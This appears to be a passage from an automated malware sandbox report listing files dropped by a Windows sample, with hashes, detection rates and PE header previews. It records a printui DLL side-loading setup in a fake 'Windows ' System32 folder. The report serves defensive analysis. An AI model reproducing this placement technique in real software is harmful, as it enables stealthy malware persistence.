                                                                                      SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeGet hashmaliciousUnknownBrowse
                                                                                        F.7zGet hashmaliciousUnknownBrowse
                                                                                          Ld0f3NDosJ.exeGet hashmaliciousUnknownBrowse

                                                                                            Created / dropped Files

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:modified
                                                                                            Size (bytes):64
                                                                                            Entropy (8bit):0.34726597513537405
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Nlll:Nll
                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                            Malicious:false
                                                                                            Preview:@...e...........................................................

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0xodcmcc.wv1.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2cp1y2yw.c3d.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4usgmjep.cbr.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fiiml03m.cmu.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gfskesqh.kjb.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hbj4jjgz.5r2.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jirgaqoh.bt2.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mkrnqcof.t5m.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oga0p5cf.wbh.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vjijcwbg.juz.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x4f3wqyh.ok5.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ye05kt0t.qem.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Windows \System32\printui.dll

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\58VSNPxrI4.exe
                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):14162432
                                                                                            Entropy (8bit):6.553472819596516
                                                                                            Encrypted:false
                                                                                            SSDEEP:393216:sPsdXtBcda7nzo7Vd7Qv1CPwDvt3uFRCyGTQP76NuudqfZnXSdEVB3:sITk1
                                                                                            MD5:D208410BAE05CFA96A7C83C4CE614DD1
                                                                                            SHA1:2B120F3BD686CB5E7E29D338AFAB78DD9970C70C
                                                                                            SHA-256:DC42B209DA59C321377F42575F4A43E38036A6482556436B2774CFD08E402668
                                                                                            SHA-512:949651249C8A40223DDA7BB3183F620B7949CF0AFD54CC57F34163595AABA03594E5BAC06237D4367D025C3D05C6BC28FC81D4916EBA04D8BCB35BF6031FF235
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 32%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........t...[..[..[...ZB..[...Z...[...Z..[.).Z..[.).Z..[.).Z...[...Z..[..[x..[l).Z..[l).[..[l).Z..[Rich..[........PE..d....Neg.........." ...*."................................................................`.................................................D...<....`....... ...,...........p......@}..8............................|..@............@..H............................text.... .......".................. ..`.rdata..^....@.......&..............@..@.data....*..........................@....pdata...,... ......................@..@.fptable.....P......................@....rsrc........`......................@..@.reloc.......p......................@..B................................................................................................................................................................................................................

                                                                                            C:\Windows \System32\printui.exe

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\58VSNPxrI4.exe
                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):64000
                                                                                            Entropy (8bit):6.336447440888565
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:a4uHmXrH60qKdC5vI1iQfCIWVM9G4qW4ne+S/ly+PKAoXRZX6fbX57UWkCRPPA7f:Uca1KAVIPd4n+lbeRZIbSQPPA7f
                                                                                            MD5:2FC3530F3E05667F8240FC77F7486E7E
                                                                                            SHA1:C52CC219886F29E5076CED98D6483E28FC5CC3E0
                                                                                            SHA-256:AC75AF591C08442EA453EB92F6344E930585D912894E9323DB922BCD9EDF4CD1
                                                                                            SHA-512:EF78DE6A114885B55806323F09D8BC24609966D29A31C2A5AE6AD93D1F0D584D29418BA76CA2F235ED30AD8AE2C91F552C15487C559E0411E978D397C82F7046
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: pyld611114.exe, Detection: malicious, Browse
                                                                                            • Filename: dYUteuvmHn.exe, Detection: malicious, Browse
                                                                                            • Filename: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe, Detection: malicious, Browse
                                                                                            • Filename: app64.exe, Detection: malicious, Browse
                                                                                            • Filename: printui.dll, Detection: malicious, Browse
                                                                                            • Filename: SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exe, Detection: malicious, Browse
                                                                                            • Filename: F.7z, Detection: malicious, Browse
                                                                                            • Filename: Ld0f3NDosJ.exe, Detection: malicious, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y..........................................................................Rich....................PE..d...0.sA.........."............................@.............................@.......E....`.......... .......................................'.......P.......@...............0..$...P$..T............................ ..............(!...............................text............................... ..`.rdata....... ......................@..@.data...x....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..$....0......................@..B........................................................................................................................................................................................................................................................................

                                                                                            C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:modified
                                                                                            Size (bytes):64
                                                                                            Entropy (8bit):0.34726597513537405
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Nlll:Nll
                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                            Malicious:false
                                                                                            Preview:@...e...........................................................

                                                                                            C:\Windows\System32\console_zero.exe

                                                                                            Download File
                                                                                            Process:C:\Windows \System32\printui.exe
                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):664576
                                                                                            Entropy (8bit):6.597455315682964
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:UKDPkqL1NxW6CDBPXRiD2xTph0lhSMXli6Y2ej+4J7:UQhN+9PXYDQh0lhSMXlpY2ej+
                                                                                            MD5:4ECCB8F5D1EDCF18A11ABED91FF85C46
                                                                                            SHA1:4CF96EF88D3D042D050CC8D963EF2141975A196A
                                                                                            SHA-256:3286EDB355B9AFCB9F08CA87967001A56685D2298014C82A672EF3769E232838
                                                                                            SHA-512:EC8B97CE4712CF94E9C9F5C0454FCBC52559AC4D7D076BF76E2E6A3052FBF18696A5F1BC602A70A06D5101E3F1BCD8B64995A2D71731E7CCB939FE67224924F9
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 42%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~....yV..yV..yV..|Wz.yV..}W..yV..zW..yV.zW..yV.}W..yV.|W..yVT.xW..yV..xW..yV..xVH.yVT.pW..yVT..V..yVT.{W..yVRich..yV........................PE..d....Neg.........."....*..... ......p..........@..........................................`.................................................L...P....`...........L...........p..T...0...8...............................@............0...............................text............................... ..`.rdata..8....0......................@..@.data....3..........................@....pdata...L.......N..................@..@.fptable.....P......................@....rsrc........`......................@..@.reloc..T....p......................@..B........................................................................................................................................................................................

                                                                                            C:\Windows\System32\libcrypto-3-x64.dll

                                                                                            Download File
                                                                                            Process:C:\Windows \System32\printui.exe
                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):4684800
                                                                                            Entropy (8bit):6.761708409908653
                                                                                            Encrypted:false
                                                                                            SSDEEP:98304:E1+WtBcda7nzo7Vd8qQQPQ1CPwDvt3uFGCC:gXtBcda7nzo7Vd8qQQY1CPwDvt3uFGCC
                                                                                            MD5:158F0E7C4529E3867E07545C6D1174A9
                                                                                            SHA1:9FF0CCCB271F0215AD24427B7254832549565154
                                                                                            SHA-256:DCC1FA1A341597DDB1476E3B5B3952456F07870A26FC30B0C6E6312764BAA1FC
                                                                                            SHA-512:51E79D8D0AB183046F87AA659973B45147BB1E1AE8883F688C615CCB18BF9FCCB8779DD872B01748BACD56E141BC096C2BB4CCF32EBD7A49ADC76363355E40FE
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............vI..vI..vI..I..vI;DwH..vI;DsH..vI;DrH..vI;DuH..vI..wI*.vI..wH..vI..vI..vI.GrHl.vI.GvH..vI.G.I..vI.GtH..vIRich..vI........PE..d...d.Lf.........." ...'..4..........4.......................................G...........`...........................................A. ... @D.@....0G.......D.LH...........@G.L.....?.T.............................?.@.............4..............................text...8.4.......4................. ..`.rdata..*.....4.......4.............@..@.data....t...`D..J...JD.............@....pdata..LH....D..J....D.............@..@.rsrc........0G.......F.............@..@.reloc..L....@G.......F.............@..B................................................................................................................................................................................................................................................

                                                                                            C:\Windows\System32\libcurl.dll

                                                                                            Download File
                                                                                            Process:C:\Windows \System32\printui.exe
                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):588800
                                                                                            Entropy (8bit):6.3852695857936554
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:1dkYvMQmNkYBasGpIFetxo8u3zTkIXmaKSTQP76NuudqbaRArq:1zvMQmmYB4KQ7nu3zuSTQP76NuudqbaF
                                                                                            MD5:18CE47F58B4C1A9CFC1EDF7C8BF49B7C
                                                                                            SHA1:E74D08AB06ED8200D7E674D8031D6DF8250DE8CB
                                                                                            SHA-256:36D97F1C254832CEE9698CEA2F1A63EA98D231641FD29715EF581BE103ACE602
                                                                                            SHA-512:19B2D6968095C4E8F08C66AB73E7EC5E0439712BCB2777266602EF2AD123A779395A3D44BC0C7C9945376998FB2165BC60E6BF682863A55A0CFF40C720594BDD
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$............|.X.|.X.|.X...X.|.X...Y.|.X..`X.|.X...Y.|.X...Y.|.X...Y.|.X...Y.|.X.|.Xh|.X...Y.|.X...Y.|.X...Y.|.X..bX.|.X.|.X.|.X...Y.|.XRich.|.X........................PE..d...o..f.........." ...).....`......@........................................0............`..........................................Q..$...4[..T................Z........... ..0... ...T...............................@...............`............................text.............................. ..`.rdata..D...........................@..@.data....1...p...*...d..............@....pdata...Z.......\..................@..@.rsrc...............................@..@.reloc..0.... ......................@..B................................................................................................................................................................................................................

                                                                                            C:\Windows\System32\libiconv-2.dll

                                                                                            Download File
                                                                                            Process:C:\Windows \System32\printui.exe
                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1851113
                                                                                            Entropy (8bit):6.295735352298234
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:SAlxpPnBAUZLY9OVbbTiZGavkg3NyeuQ6l9fH+f2ykqZrkgecviRd7mQFz:DPnBAUZLY9OEZGaXBuQQ9e2YYUQFz
                                                                                            MD5:158BC77453D382CF6679CE35DF740CC5
                                                                                            SHA1:9A3C123CE4B6F6592ED50D6614387D059BFB842F
                                                                                            SHA-256:CF131738F4B5FE3F42E9108E24595FC3E6573347D78E4E69EC42106C1EEBE42C
                                                                                            SHA-512:6EB1455537CB4E62E9432032372FAE9CE824A48346E00BAF38EF2F840E0ED3F55ACAEE2656DA656DB00AE0BDEF808F8DA291DD10D7453815152EDA0CCFC73147
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...8.Jd....q.....& ..."............P..........f............................................. .................................................D....@..........d............P..................................(.......................p............................text..............................`.P`.data...............................@.P..rdata..............................@.`@.pdata..d...........................@.0@.xdata..............................@.0@.bss..................................`..edata..............................@.0@.idata..D...........................@.0..CRT....X.... ......................@.@..tls.........0......................@.@..rsrc........@......................@.0..reloc.......P......................@.0B/4...... ....`......................@..B/19.....m....p... ..................@..B/31......2.......4..................@..B/45.....

                                                                                            C:\Windows\System32\libintl-9.dll

                                                                                            Download File
                                                                                            Process:C:\Windows \System32\printui.exe
                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):475769
                                                                                            Entropy (8bit):5.442192544327632
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:YoSRYqB/kDraXbQTNRC6RsclS8DzT6Bam:+YY/kDraLQTNRCPWDzT6Bam
                                                                                            MD5:E79E7C9D547DDBEE5C8C1796BD092326
                                                                                            SHA1:8E50B296F4630F6173FC77D07EEA36433E62178A
                                                                                            SHA-256:1125AC8DC0C4F5C3ED4712E0D8AD29474099FCB55BB0E563A352CE9D03EF1D78
                                                                                            SHA-512:DBA65731B7ADA0AC90B4122C7B633CD8D9A54B92B2241170C6F09828554A0BC1B0F3EDF6289B6141D3441AB11AF90D6F8210A73F01964276D050E57FB94248E2
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......[.H........& .....D....................(h....................................0......... ......................................................@..8....................P..p........................... 0..(....................................................text...8C.......D..................`.P`.data........`.......J..............@.`..rdata..0M...p...N...L..............@.`@.pdata..............................@.0@.xdata..d...........................@.0@.bss....P.............................`..edata..............................@.0@.idata..............................@.0..CRT....X.... ......................@.@..tls....h....0......................@.`..rsrc...8....@......................@.0..reloc..p....P......................@.0B/4...........`......................@.PB/19..........p......................@..B/31.....1:.......<..................@..B/45.....

                                                                                            C:\Windows\System32\libpq.dll

                                                                                            Download File
                                                                                            Process:C:\Windows \System32\printui.exe
                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):327168
                                                                                            Entropy (8bit):6.055910692008984
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:veJ/i9L1mle2NwGTQ46ZEEKN4zP2/SHzI4l/4OMx7apSPIYuh0L/iXmJ:gmV2NwQQ3G4zP22rOIy
                                                                                            MD5:EF060E5C414B7BE5875437FF2FB8EC54
                                                                                            SHA1:6DCF04DFF9B25BE556EC97660F95ACF708C0C870
                                                                                            SHA-256:E6ACED8D30471F35B37ABBF172CE357B6A8F18AF5FEB342B6CFFC01D3378F2B4
                                                                                            SHA-512:67BFF321BA901A0B0DC0F6C4A723D7DF35418F593E16E6193673CCE5190D76355409F676C1EA5D0CB46493F5735209089A3A52D3D716EB8187BF6E846792E2E8
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........t3R..`R..`R..`[..`D..`To.aP..`To.`T..`To.a_..`To.aZ..`To.aV..`...a^..`n..aU..`R..`K..`=o.ag..`=o.aS..`=o.`S..`R.`S..`=o.aS..`RichR..`........................PE..d.....:f.........." ...&.l...........e.......................................@............`...@...................................................... ..........,"...........0.......k..T...........................pj..@...............p............................text...xj.......l.................. ..`.rdata..vT.......V...p..............@..@.data...............................@....pdata..,".......$..................@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................

                                                                                            C:\Windows\System32\libssl-3-x64.dll

                                                                                            Download File
                                                                                            Process:C:\Windows \System32\printui.exe
                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):818176
                                                                                            Entropy (8bit):6.269258421632734
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:NGbc08emtUas2F158w1T4qLgl85MNRlqnZ5ydEVB3i:NGoL9W0lJ5cR9dEVB3
                                                                                            MD5:69D0FEE0CC47C3B255C317F08CE8D274
                                                                                            SHA1:782BC8F64B47A9DCEDC95895154DCA60346F5DD7
                                                                                            SHA-256:BA979C2DBFB35D205D9D28D97D177F33D501D954C7187330F6893BB7D0858713
                                                                                            SHA-512:4955252C7220810ED2EACA002E57D25FBC17862F4878983C4351C917CF7873EB84AE00E5651583004F15A08789BE64BDB34FF20CB0E172C9C1376706DEB4AA1A
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5...q..q..q..x.'.c...O..s...O..|...O..y...O..u..:...u...L..r..q..*...L......L..p...LK.p...L..p..Richq..................PE..d...d.Lf.........." ...'..................................................................`..........................................0...K...{..................Hr..............\.......T...............................@............................................text...X........................... ..`.rdata..L...........................@..@.data...8=.......8..................@....pdata..Hr.......t..................@..@.rsrc................`..............@..@.reloc..\............d..............@..B........................................................................................................................................................................................................................................

                                                                                            C:\Windows\System32\libwinpthread-1.dll

                                                                                            Download File
                                                                                            Process:C:\Windows \System32\printui.exe
                                                                                            File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):52736
                                                                                            Entropy (8bit):5.840253326728635
